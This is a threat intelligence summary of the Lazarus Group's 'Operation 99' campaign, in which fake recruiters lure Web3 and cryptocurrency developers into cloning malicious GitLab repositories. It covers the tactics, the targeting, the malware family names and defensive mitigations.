Full Report
The North Korea-linked Lazarus Group has been attributed to a new cyber attack campaign dubbed Operation 99 that targeted software developers looking for freelance Web3 and cryptocurrency work to deliver malware. "The campaign begins with fake recruiters, posing on platforms like LinkedIn, luring developers with project tests and code reviews," Ryan Sherstobitoff, senior vice president of Threat
Analysis Summary
# Threat Actor: Lazarus Group
## Attribution & Identity
**Attribution:** North Korea-linked.
**Known Aliases and Associated Groups:** Follows previous job-themed tactics observed in attacks like Operation Dream Job (aka NukeSped).
## Activity Summary
The threat actor is conducting a new cyber attack campaign dubbed **Operation 99**. This operation specifically targets software developers seeking freelance work in the **Web3 and cryptocurrency** sectors. The scheme involves:
1. **Initial Approach:** Fake recruiters use deceptive profiles, primarily on **LinkedIn**, to engage developers.
2. **Luring:** Victims are lured with project tests and code reviews.
3. **Infection Vector:** Victims are directed to clone a malicious **GitLab repository**.
4. **Execution:** The cloned code connects to Command-and-Control (C2) servers, embedding malware into the victim's environment.
The end goal is to deploy data-stealing implants to extract sensitive information. The campaign was discovered on January 9, 2025.
## Tactics, Techniques & Procedures
- **Social Engineering:** Use of fake recruiters and deceptive LinkedIn profiles to initiate contact.
- **Spearphishing/Baiting:** Luring victims with job opportunities (freelance Web3/crypto work, project tests, code reviews).
- **Supply Chain Compromise (via Code Hosting):** Directing victims to clone malicious GitLab repositories to execute malware upon cloning/execution.
- **Command and Control (C2):** Cloned code connects to C2 servers to deliver further payloads.
- **Data Exfiltration:** Deploying implants designed to steal source code, secrets, and cryptocurrency wallet keys.
- [MITRE ATT&CK IDs are not explicitly provided in the source material.]
## Targeting
**Sectors:** Software Developers, specifically those targeting **Web3 and cryptocurrency** freelance work.
**Geography:** Victims identified globally, with a **significant concentration in Italy**. Lesser numbers of victims in Argentina, Brazil, Egypt, France, Germany, India, Indonesia, Mexico, Pakistan, the Philippines, the U.K., and the U.S.
**Victims:** Software developers globally.
## Tools & Infrastructure
**Malware Families Used:**
- Main5346 and its variant Main99 (downloader).
- Payload99/73 (and its functionally similar Payload5346) (additional payloads delivered by Main99).
**Infrastructure (C2, domains, IPs):**
- Malicious GitLab repositories (used as the initial infection vector).
- Command-and-Control (C2) servers (implied destination for initial beaconing).
## Implications
Operation 99 highlights Lazarus Group's strategic shift towards financially motivated attacks targeting high-value crypto/Web3 development talent. By leveraging seemingly legitimate freelance recruitment via platforms like LinkedIn and weaponizing code repositories, the group bypasses traditional perimeter defenses and gains direct access to developer environments, increasing the risk of source code theft and credential compromise critical to the cryptocurrency ecosystem.
## Mitigations
- Exercise extreme caution when accepting project collaboration requests or cloning code/repositories from unknown or new sources, especially those originating from unsolicited recruitment contacts.
- Implement strict source control policies; scrutinize code from external repositories before integrating or running builds, even if purportedly for testing/review purposes.
- Harden development environments, ensuring source code, API keys, and cryptocurrency wallet secrets are segregated and protected with multi-factor authentication.
- Security teams should monitor for beaconing activity originating from development workstations that interact with unfamiliar or newly cloned git repositories.